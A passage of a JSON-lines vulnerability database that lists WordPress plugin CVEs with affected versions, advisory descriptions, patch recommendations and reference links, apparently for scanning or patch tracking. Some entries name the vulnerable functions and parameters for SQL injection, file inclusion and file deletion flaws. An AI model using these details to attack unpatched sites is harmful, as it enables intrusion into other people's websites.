version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca7837c-ad24-44ce-b073-7df3f8bc4300?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca7837c-ad24-44ce-b073-7df3f8bc4300?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/very-simple-google-maps\\\/trunk\\\/very-simple-google-maps.php?rev=2941389#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/very-simple-google-maps\\\/trunk\\\/very-simple-google-maps.php?rev=2941389#L22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982539\\\/very-simple-google-maps#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982539\\\/very-simple-google-maps#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10362","slug":"ultimate-social-media-icons","versionImpact":"2.9.0","versionEndExcluding":"2.9.1","description":"The Social Media Share Buttons & Social Sharing Icons WordPress plugin before 2.9.1 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/701f653b-a0c3-49b4-972e-f26c3633ad92\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/701f653b-a0c3-49b4-972e-f26c3633ad92\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5530","slug":"woolentor-addons","versionImpact":"2.9.0","versionEndExcluding":"2.9.1","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +12 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's WL: Product Horizontal Filter widget in all versions up to, and including, 2.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc2c2df-b590-413f-ba07-5aa645d069b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc2c2df-b590-413f-ba07-5aa645d069b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.9\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php#L1091\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.9\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php#L1091\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100260\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100260\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1962","slug":"cm-download-manager","versionEndExcluding":"2.9.1","description":"The CM Download Manager WordPress plugin before 2.9.1 does not have CSRF checks in some places, which could allow attackers to make logged in admins edit downloads via a CSRF attack.","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/469486d4-7677-4d66-83c0-a6b9ac7c503b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/469486d4-7677-4d66-83c0-a6b9ac7c503b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1512","slug":"powerpack-lite-for-elementor","versionImpact":"2.9.0","versionEndExcluding":"2.9.1","description":"The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Cursor Extension in all versions up to, and including, 2.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262339\\\/powerpack-lite-for-elementor\\\/trunk\\\/assets\\\/js\\\/pp-custom-cursor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262339\\\/powerpack-lite-for-elementor\\\/trunk\\\/assets\\\/js\\\/pp-custom-cursor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90579442-b05c-459e-93cb-f4883b6472ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90579442-b05c-459e-93cb-f4883b6472ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10528","slug":"ultimate-member","versionImpact":"2.8.9","versionEndExcluding":"2.9.0","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to unauthorized profile picture updates due to a missing capability check on the wp_ajax_um_resize_image() and ajax_resize_image() functions in all versions up to, and including, 2.8.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the profile pictures of other users.","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L332\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L371\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/ab05bc570a8ba6449cd470791be1c0670eb9c203\\\/includes\\\/core\\\/class-files.php#L371\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186722%40ultimate-member&new=3186722%40ultimate-member&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186722%40ultimate-member&new=3186722%40ultimate-member&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a9793b6-2186-46ef-b204-d8f8f154ebf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a9793b6-2186-46ef-b204-d8f8f154ebf3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2270","slug":"countdown-builder","versionImpact":"2.8.9.1","versionEndExcluding":"2.9.0","description":"The Countdown, Coming Soon, Maintenance \u2013 Countdown & Clock plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.8.9.1 via the createCdObj function. This makes it possible for unauthenticated attackers to include and execute files with the specific filenames on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in some cases.","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/RegisterPostType.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/RegisterPostType.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2260d6b-1a41-4757-a063-8b8857ef416a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2260d6b-1a41-4757-a063-8b8857ef416a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13316","slug":"scratch-win-giveaways-for-website-facebook","versionImpact":"2.8.0","versionEndExcluding":"2.9.0","description":"The Scratch & Win \u2013 Giveaways and Contests. Boost subscribers, traffic, repeat visits,  referrals, sales and more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the apmswn_create_discount() function in all versions up to, and including, 2.8.0. This makes it possible for unauthenticated attackers to create coupons.","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/socialscratchwin.php#L492\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/socialscratchwin.php#L492\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212730%40scratch-win-giveaways-for-website-facebook&new=3212730%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212730%40scratch-win-giveaways-for-website-facebook&new=3212730%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239997%40scratch-win-giveaways-for-website-facebook&new=3239997%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239997%40scratch-win-giveaways-for-website-facebook&new=3239997%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95103830-9009-48df-ab15-476402b59e3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95103830-9009-48df-ab15-476402b59e3f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1232","slug":"cm-download-manager","versionEndExcluding":"2.9.0","description":"The CM Download Manager  WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete downloads via a CSRF attack","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a29b509-4cd5-43c8-84f4-f86251dd28f8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a29b509-4cd5-43c8-84f4-f86251dd28f8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1231","slug":"cm-download-manager","versionEndExcluding":"2.9.0","description":"The CM Download Manager  WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins unpublish downloads via a CSRF attack","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d3968d9-61ed-4c00-8764-0360cf03255e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d3968d9-61ed-4c00-8764-0360cf03255e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7258","slug":"wp-product-feed-manager","versionImpact":"2.8.0","versionEndExcluding":"2.9.0","description":"The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wppfm_removeFeedFile' function in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L537\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-product-feed-manager\\\/trunk\\\/includes\\\/data\\\/js\\\/wppfm_ajaxdatahandling.js#L575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137475\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137475\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2440","slug":"theme-editor","versionImpact":"2.8","versionEndExcluding":"2.9","description":"The Theme Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'images_array' parameter in versions up to, and including 2.8. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-editor\\\/trunk\\\/ms_child_theme_editor.php#L495\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-editor\\\/trunk\\\/ms_child_theme_editor.php#L495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142694\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142694\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12322","slug":"theperfectweddingnl-widget","versionImpact":"2.8","versionEndExcluding":"2.9","description":"The ThePerfectWedding.nl Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8. This is due to missing or incorrect nonce validation on the 'update_option' function. This makes it possible for unauthenticated attackers to update the 'tpwKey' option with stored cross-site scripting via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theperfectweddingnl-widget\\\/trunk\\\/admin\\\/tpwAdminPanelTemplate.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e996f71a-f0b9-4e10-873e-a0299a099dce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e996f71a-f0b9-4e10-873e-a0299a099dce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9696","slug":"rescue-shortcodes","versionImpact":"2.8","versionEndExcluding":"2.9","description":"The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rescue_tab' shortcode in all versions up to, and including, 2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9517db1f-1704-4f25-9b02-795da3c4c067?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9517db1f-1704-4f25-9b02-795da3c4c067?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167329%40rescue-shortcodes&new=3167329%40rescue-shortcodes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167329%40rescue-shortcodes&new=3167329%40rescue-shortcodes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9891","slug":"multiline-files-for-contact-form-7","versionImpact":"2.8.1","versionEndExcluding":"2.9","description":"The Multiline files upload for contact form 7 plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the mfcf7_zl_custom_handle_deactivation_plugin_form_submission() function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin and send a custom reason from the site.","recommendation":"Update to version 2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf62f45-a142-497e-9838-ce0b1b1bb3d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf62f45-a142-497e-9838-ce0b1b1bb3d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/2.8.1\\\/multiline-files-for-contact-form-7\\\/multiline-admin.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/2.8.1\\\/multiline-files-for-contact-form-7\\\/multiline-admin.php#L410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169228\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169228\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5560","slug":"wp-useronline","versionImpact":"2.88.2","versionEndExcluding":"2.88.3","description":"The WP-UserOnline WordPress plugin before 2.88.3 does not sanitise and escape the X-Forwarded-For header before outputting its content on the page, which allows unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.88.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55d23184-fc5a-4090-b079-142407b59b05\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55d23184-fc5a-4090-b079-142407b59b05\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7225","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.16","versionEndExcluding":"2.88.17","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the width and height parameters in all versions up to, and including, 2.88.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.88.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fce76126-0cfd-464f-b644-45d4301e958d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fce76126-0cfd-464f-b644-45d4301e958d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023266%40mappress-google-maps-for-wordpress%2Ftrunk&old=3022439%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023266%40mappress-google-maps-for-wordpress%2Ftrunk&old=3022439%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-7225\\\/\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-7225\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0421","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.15","versionEndExcluding":"2.88.16","description":"The MapPress Maps for WordPress plugin before 2.88.16 does not ensure that posts to be retrieve via an AJAX action is a public map, allowing unauthenticated users to read arbitrary private and draft posts.","recommendation":"Update to version 2.88.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/587acc47-1966-4baf-a380-6aa479a97c82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/587acc47-1966-4baf-a380-6aa479a97c82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0420","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.14","versionEndExcluding":"2.88.15","description":"The MapPress Maps for WordPress plugin before 2.88.15 does not sanitize and escape the map title when outputting it back in the admin dashboard, allowing Contributors and above roles to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.88.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6187ef8-70f4-4911-abd7-42bf6b7e54b7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6187ef8-70f4-4911-abd7-42bf6b7e54b7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6524","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.13","versionEndExcluding":"2.88.14","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the map title parameter in all versions up to and including 2.88.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.88.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a8f025-c2ab-4a5f-a99e-a2d19b14a190?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a8f025-c2ab-4a5f-a99e-a2d19b14a190?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3001436%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.13&new=3015598%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.14#file31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3001436%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.13&new=3015598%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.14#file31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6524\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6524\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26015","slug":"mappress-google-maps-for-wordpress","versionEndExcluding":"2.85.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Chris Richardson MapPress Maps for WordPress mappress-google-maps-for-wordpress allows SQL Injection.This issue affects MapPress Maps for WordPress: from n\/a through 2.85.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mappress-google-maps-for-wordpress\\\/wordpress-mappress-maps-for-wordpress-plugin-2-85-4-authenticated-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mappress-google-maps-for-wordpress\\\/wordpress-mappress-maps-for-wordpress-plugin-2-85-4-authenticated-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13507","slug":"geodirectory","versionImpact":"2.8.97","versionEndExcluding":"2.8.98","description":"The GeoDirectory \u2013 WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to time-based SQL Injection via the dist parameter in all versions up to, and including, 2.8.97 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.8.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/class-geodir-query.php#L733\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/class-geodir-query.php#L733\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225839%40geodirectory%2Ftrunk&old=3223673%40geodirectory%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225839%40geodirectory%2Ftrunk&old=3223673%40geodirectory%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a15a22-d6f3-4829-995d-7fa14d1db7a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a15a22-d6f3-4829-995d-7fa14d1db7a9?source=cve\",\"refsource\":\"\",\"tags\":[